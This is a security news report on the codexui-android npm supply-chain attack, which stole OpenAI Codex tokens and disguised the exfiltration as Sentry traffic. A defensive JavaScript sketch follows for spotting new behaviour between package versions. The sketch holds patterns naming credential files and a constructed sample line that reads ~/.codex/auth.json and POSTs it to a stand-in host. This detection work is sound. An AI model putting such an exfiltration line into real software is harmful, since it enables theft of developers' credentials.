Aikido Security researcher Charlie Eriksen this week disclosed a supply-chain attack against developers using OpenAI Codex that ran for approximately one month before detection. The attack vector was a functioning npm package named codexui-android, which had reached 29,000 weekly downloads on its own and was distributed alongside two Android applications with combined install counts of more than 60,000. The package did real work and was useful enough that developer adoption looked organic. The malicious functionality was added in a later version after the package had built trust.

The payload extracted access tokens, refresh tokens, ID tokens, and account identifiers from the OpenAI Codex authentication file at ~/.codex/auth.json on the developer's machine, then exfiltrated the credentials to attacker-controlled infrastructure disguised as a Sentry endpoint. The detection-evasion technique was straightforward: traffic to “sentry”-named endpoints is widely whitelisted in developer environments, and the volume of legitimate Sentry traffic on a typical developer machine is high enough to mask the malicious uploads.

What makes this disclosure worse than typical is the persistence model. OpenAI's refresh tokens do not expire. Once exfiltrated, a Codex refresh token enables indefinite account impersonation. Token rotation, the standard mitigation for this class of theft, does not apply because there is no expiration window to wait out. Developers whose tokens were stolen need to actively revoke the credential through OpenAI's revocation flow, and need to assume that any work done under the compromised account during the active window has been exposed.

The attack pattern is novel and is worth understanding because it is going to recur. The traditional supply-chain attack on a package manager has been typosquatting or namespace confusion — register a malicious package that looks like a legitimate one, harvest the credentials of developers who fat-finger the install. The defense was a combination of allow-listing, naming-convention enforcement, and detection at the registry layer. None of those defenses work against the codexui-android pattern, because the package was a real, functioning, legitimate-looking package for weeks before it became malicious. The trust was built. The malice was introduced once the trust was in place.

For security teams in 2026, three implications are operational. First, the npm ecosystem and adjacent package managers need continuous behavioral monitoring of installed packages, not just point-in-time vetting at install. Behavioral changes between versions are the signal. Second, developer-machine secret hygiene — including the assumption that long-lived tokens are stealable — has to drive how AI developer tools are designed. Third, the AI-tooling ecosystem is now a primary supply-chain target. The codexui-android attack is the second confirmed June 1 supply-chain hit on AI developer infrastructure, alongside the Miasma Red Hat npm attack disclosed the same day. The pattern is converging fast.
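The version-to-version behavioral diff described above, as an added sketch (not code from Aikido or from the original report). The package name, hosts, file contents and indicator patterns are constructed assumptions; the point is that a newly appearing host or credential path is flagged regardless of how benign its name looks.

```javascript
// Constructed example: report behavioral indicators that first appear in a new version.
// The patterns below are illustrative assumptions, not a complete rule set.
const RULES = {
  credentialPath: /\.codex\/auth\.json|\.npmrc|\.ssh\/id_[a-z0-9]+|\.aws\/credentials/g,
  networkHost: /https?:\/\/([a-z0-9.-]+)/gi,
  processSpawn: /\bchild_process\b/g,
};
const LIFECYCLE = ["preinstall", "install", "postinstall"];

// Collect "kind:value" indicators from a package manifest and its source files.
function indicators(pkg) {
  const found = new Set();
  for (const hook of LIFECYCLE) {
    if (pkg.manifest.scripts && pkg.manifest.scripts[hook]) found.add(`lifecycle:${hook}`);
  }
  for (const source of Object.values(pkg.files)) {
    for (const [kind, pattern] of Object.entries(RULES)) {
      for (const m of source.matchAll(pattern)) {
        found.add(`${kind}:${(m[1] || m[0]).toLowerCase()}`);
      }
    }
  }
  return found;
}

// Indicators present in the new version but absent from the previous one.
function newBehavior(oldPkg, newPkg) {
  const before = indicators(oldPkg);
  return [...indicators(newPkg)].filter((i) => !before.has(i)).sort();
}

// Constructed sample: two versions of a hypothetical package "example-ui".
const v1 = {
  manifest: { name: "example-ui", version: "1.4.0", scripts: { build: "tsc" } },
  files: { "index.js": 'fetch("https://api.example.invalid/status");' },
};
const v2 = {
  manifest: { name: "example-ui", version: "1.5.0", scripts: { build: "tsc" } },
  files: {
    "index.js": 'fetch("https://api.example.invalid/status");',
    "telemetry.js":
      'const p = os.homedir() + "/.codex/auth.json";\n' +
      'fetch("https://sentry.example.invalid/ingest", { method: "POST", body: read(p) });',
  },
};

console.log(newBehavior(v1, v2));
```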

Watch for: OpenAI's response on refresh-token lifetime architecture, comparable patterns targeting Anthropic and Google AI developer tooling, and whether npm itself implements behavioral-anomaly detection at the package level.

Reporting based on The Hacker News coverage and Aikido Security's disclosure.